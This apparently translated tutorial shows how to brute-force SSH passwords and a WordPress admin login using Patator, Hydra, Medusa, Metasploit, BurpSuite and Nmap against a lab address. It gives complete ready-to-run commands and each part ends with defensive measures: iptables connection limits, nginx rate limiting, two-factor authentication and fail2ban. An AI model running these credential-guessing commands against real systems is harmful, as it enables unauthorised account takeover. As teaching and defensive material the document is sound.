Brute-force attacks using Kali Linux

Brute-force (brute-force attack) is a method for solving mathematical problems, the complexity of which depends on the number of all possible solutions. The term brute-force itself is usually used in the context of hacker attacks, when an attacker tries to pick up the login / password for any account or service.

Consider the tools that can be used to perform brute-force attacks on SSH and WEB-services available in Kali Linux (Patator, Medusa, Hydra, Metasploit), as well as BurpSuite.

All materials provided under this article are intended for use solely for educational purposes. The use of materials in illegal and illegal is prohibited.

Brute-force SSH

For example, let's take a test machine 192.168.60.50 and try to pick up the user password for the test via SSH. We will use the popular passwords from the standard rockyou.txt dictionary.
')

---

Patator
To select a password using Patator, use the command:

patator ssh_login host=192.168.60.50 user=test password=FILE0 0=/root/wordlist -x ignore:mesg='Authentication failed'

Where:
ssh_login - the required module
host is our goal
user - username to which a password is selected or a file with logins for multiple selection
password - password dictionary
-x ignore: mesg = 'Authentication failed' - command not to display the line that has this message. The filtering parameter is selected individually.

---

Hydra
To select a password using Hydra, execute the command:

hydra -V -f -t 4 -l test -P /root/wordlist ssh://192.168.60.50

Where:
-V - show pair login + password during brute force
-f - stop as soon as the password for the specified login is found
-P - path to the dictionary with passwords
ssh: //192.168.60.50 - an indication of the service and the IP address of the victim

---

Medusa
To select a password using Medusa, run the following command:

medusa -h 192.168.60.50 -u test -P /root/wordlist -M ssh -f -v 6

Where:
-h - victim's IP address
-u - login
-P - dictionary path
-M - select module
-f - stop after finding valid login / password pair
-v - setting display messages on the screen during the selection process

---

Metasploit
Let's search for a tool to conduct a brute-force attack on SSH:
search ssh_login and got the answer:



Enable the module:

use auxiliary/scanner/ssh/ssh_login

To view the required parameters, use the show options command. For us it is:
rhosts - victim's ip address
rport - port
username - SSH login
userpass_file - path to the dictionary
stop_on_success - stop as soon as there is a login / password pair
threads - the number of threads



The indication of the required parameters is made through the " set " command.

set rhosts 192.168.60.50
set username test
set userpass_file /root/wordlist
set stop_on_success yes
set threads 4
set rport 22

Having specified the necessary parameters, we type the " run " command and wait.

Opposition

Limit the number of connections to be established using a firewall. An example of iptables configuration:

-A INPUT -i eth0 -p tcp --dport 22 -m connlimit --connlimit-above 1 --connlimit-mask 32 -j REJECT --reject-with tcp-reset .

Such a rule will establish an access restriction to SSH for each IP address up to 1 connection per second, significantly complicating the search. Also, an effective solution could be to use two-factor authentication (for example, using eToken) or key-pair authentication, as well as the use of IP-based ACLs.

Brute-force WordPress

Consider another example - the selection of the password of the authorization window of the web form.



For example, we will select the password from the wordpress administrator account.

---

Burpsuite
First we need to understand how the authorization process takes place. For this we will use BurpSuite. We need to try to log in with any password and login to see which requests go through BurpSuite.



Great, we saw a POST request for authorization, and we will work with it.
BODY indicates which login and password were checked, which means we can try to substitute the values ​​we need on our own.
We transfer this request to Intruder and there we select the necessary parameters for the attack. In the Payload Positions item, the type of attack is left by the sniper, but for verification we leave only the pwd parameter. Thus, during an attack, only this parameter will change.



Load the necessary dictionary and start the attack.



From the behavior of the web application, we see that the wrong password returns the response code 200. After searching the dictionary, we see that one of the passwords gave the answer with the code 302 - it is the right one.



This brute force method takes much longer than using Patator, Hydra, Medusa, etc. Even with the fact that we took a small dictionary, BurpSuite went through the dictionary for about 40 minutes.

---

Hydra
Let's try to find a password using Hydra.
As we already know, if the authorization is incorrect, the code returns 200, and if successful, 302. Let's try to use this information.
To run, use the command:

hydra -V -f -l admin -P /root/wordlist -t 4 http-post-form://192.168.60.50 -m "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1:S=302"

Here we specify the required parameters:
-l - username
-P - dictionary with passwords
-t - the number of threads
http-post-form - the type of the form, we have POST.
/wp-login.php is the URL of the page with authorization
^ USER ^ - shows where to substitute the username
^ PASS ^ - shows where to insert password from the dictionary
S = 302 - an indication of what answer to rely on Hydra. In our case, the answer is 302 upon successful authorization.

---

Patator
As we already know, upon unsuccessful authorization, the code returns 200, and if successful, 302. We will use the same principle as with Hydra:
Start is made by command:

patator http_fuzz url=http://192.168.60.50/wp-login.php method=POST body='log=admin&pwd=FILE0&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.60.50%2Fwp-admin%2F&testcookie=1' 0=/root/wordlist -t 4 before_urls=http://192.168.60.50/wp-login.php -x ignore:code=200 accept_cookie=1

http_fuzz - module for brute-force http attack
url - address of the page with authorization
FILE0 - path to the dictionary with passwords
body - information that is transmitted in the POST request during authorization
-t - the number of threads
-x - In this case, we specified the command not to display messages on the screen that contain the parameter with the code 200
accept_cookie - save the cookie setting and pass it to the next request
As a result, we managed to find a password.

---

Nmap
The Nmap utility allows, among other things, the selection of passwords for authorization web forms, if you use the http-wordpress-brute script with the appropriate arguments:
--script-args - add arguments
user or userdb - login or file with logins
pass or passdb - specifying a password or dictionary
thread - the number of threads
firstonly = true - output the result after the first correct password

nmap 192.168.60.50 --script http-wordpress-brute --script-args 'user= admin,passdb= /root/wordlist, http-wordpress-brute.thread=3, brute.firstonly=true'

Opposition

You can limit (complicate) brute-force attacks against web applications using iptables tools (similar to SSH) and nginx tools. To do this, you must create a zone of limits:
...
limit_req_zone $binary_remote_addr zone=req_limits:10m rate=30r/s;
...

and activate it:
location / {
...
limit_req zone=req_limits burst=10;
limit_req_status 429;
...
}

Such settings will limit the number of requests from a single IP address to 40 per second.

To complicate the task of busting, you can use the following methods:
- The use of a firewall and other software to limit the number of calls to the protected service. How we use machine learning to identify such attacks (including distributed) can be found in the article .
- The use of tools that prevent rapid verification of the correctness of the key (for example, Captcha).

Conclusion

In this article we have superficially examined some of the popular tools. To reduce the risk of password guessing, follow these guidelines:
- use selection-resistant passwords;
- do not create passwords using personal information, for example: date of birth or name + date of birth or mobile phone;
- Change your password regularly;
- use unique passwords on all accounts.

Such recommendations (as well as recommendations for secure web development) are not followed by everyone, so you need to use various software solutions that allow you to:
- limit the connection by IP address, or, if this is not possible, limit the simultaneous number of connections to the service (using iptables, nginx, and others);
- use two-factor authentication;
- detect and block such attacks using SIEM, WAF or other means (for example, fail2ban).